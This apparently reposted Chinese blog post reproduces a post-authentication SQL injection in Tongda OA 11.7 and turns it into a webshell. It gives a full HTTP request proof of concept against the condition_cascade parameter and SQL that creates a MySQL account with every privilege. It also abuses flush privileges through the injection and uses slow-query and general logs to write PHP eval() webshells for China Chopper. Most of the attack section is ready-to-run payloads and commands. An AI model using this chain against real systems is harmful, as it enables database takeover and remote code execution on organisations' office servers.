zoukankan      html  css  js  c++  java
  • 通达OA 11.7 后台sql注入getshell漏洞复现

     

    0x00 漏洞描述

     通达OA 11.7存在sql注入

    0x01 漏洞影响版本

     通达oa 11.7

    利用条件:需要账号登录 

    0x02 漏洞复现

    1、下载通达OA 11.7,https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe,点击安装

    2、condition_cascade参数存在布尔盲注

    POC:

    GET /general/hr/manage/query/delete_cascade.php?condition_cascade=select if((substr(user(),1,1)='r'),1,power(9999,99)) HTTP/1.1
    Host: 192.168.77.137
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    X-Requested-With: XMLHttpRequest
    Referer: http://192.168.77.137/general/index.php?isIE=0&modify_pwd=0
    Cookie: PHPSESSID=ebpjtm5tqh5tvida5keba73fr0; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c71fa06d
    DNT: 1
    Connection: close

    3、经过测试,过滤了一些函数(sleep、报错的函数等等),各种注释,使用payload:select if((1=1),1,power(9999,99))、select if((1=2),1,power(9999,99)),判断注入点 #当字符相等时,不报错,错误时报错

    4、通过添加用户at666,密码为abcABC@123

    grant all privileges ON mysql.* TO ‘at666’@’%’ IDENTIFIED BY ‘abcABC@123’ WITH GRANT OPTION

    5、使用Navicat Premium连接数据库

    6、添加的账户不能直接通过日志慢查询写入文件,需要给创建的账户添加权限

    UPDATE `mysql`.`user` SET `Password` = '*DE0742FA79F6754E99FDB9C8D2911226A5A9051D', `Select_priv` = 'Y', `Insert_priv` = 'Y', `Update_priv` = 'Y', `Delete_priv` = 'Y', `Create_priv` = 'Y', `Drop_priv` = 'Y', `Reload_priv` = 'Y', `Shutdown_priv` = 'Y', `Process_priv` = 'Y', `File_priv` = 'Y', `Grant_priv` = 'Y', `References_priv` = 'Y', `Index_priv` = 'Y', `Alter_priv` = 'Y', `Show_db_priv` = 'Y', `Super_priv` = 'Y', `Create_tmp_table_priv` = 'Y', `Lock_tables_priv` = 'Y', `Execute_priv` = 'Y', `Repl_slave_priv` = 'Y', `Repl_client_priv` = 'Y', `Create_view_priv` = 'Y', `Show_view_priv` = 'Y', `Create_routine_priv` = 'Y', `Alter_routine_priv` = 'Y', `Create_user_priv` = 'Y', `Event_priv` = 'Y', `Trigger_priv` = 'Y', `Create_tablespace_priv` = 'Y', `ssl_type` = '', `ssl_cipher` = '', `x509_issuer` = '', `x509_subject` = '', `max_questions` = 0, `max_updates` = 0, `max_connections` = 0, `max_user_connections` = 0, `plugin` = 'mysql_native_password', `authentication_string` = '', `password_expired` = 'Y' WHERE `Host` = Cast('%' AS Binary(1)) AND `User` = Cast('at666' AS Binary(5));

    7、然后用注入点刷新权限,因为该用户是没有刷新权限的权限的

    general/hr/manage/query/delete_cascade.php?condition_cascade=flush privileges;

    8、再次登录,提示密码过期,需要重新执行grant all privileges ON mysql.* TO ‘at666’@’%’ IDENTIFIED BY ‘abcABC@123’ WITH GRANT OPTION

    9、然后写shell

    方法一:

    select @@basedir;

    set global slow_query_log=on;

    set global slow_query_log_file=’C:/tongda11.7/webroot/test.php’;

    select ‘<?php eval($_POST[x]);?>’ or sleep(11);

    方法二:

    select @@basedir;

    set global general_log = on;

    set global general_log_file =’C:/tongda11.7/webroot/test2.php’;

    select ‘<?php eval($_POST[test2]);?>’;

    show variables like ‘%general%’;

    10、菜刀连接

    0x03 参考链接

    参考:https://mp.weixin.qq.com/s/8rvIT1y_odN2obJ1yAvLbw

    转载请注明:Adminxe's Blog » 通达OA 11.7 后台sql注入getshell漏洞复现

  • 相关阅读:
    一文梳理Ubuntu下Eigen矩阵运算库总结教程
    Ubuntu下安装与使用Eigen矩阵运算库教程
    Ubuntu下cmake教程实践从入门到会用
    collection of vim vim tutorial for beginner
    利用ipython实现多线程
    如何快速地从mongo中提取数据到numpy以及pandas中去
    Git Push 避免用户名和密码方法
    如何使用scikit—learn处理文本数据
    format格式
    fk输入地壳模型容易出错的地方
  • 原文地址:https://www.cnblogs.com/cn-gov/p/13715863.html
Copyright © 2011-2022 走看看